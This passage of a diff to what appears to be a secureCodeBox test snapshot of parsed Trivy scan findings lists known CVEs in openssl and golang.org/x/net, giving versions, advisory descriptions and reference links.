"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "timing attack in RSA Decryption implementation", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", - ], - }, - "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - 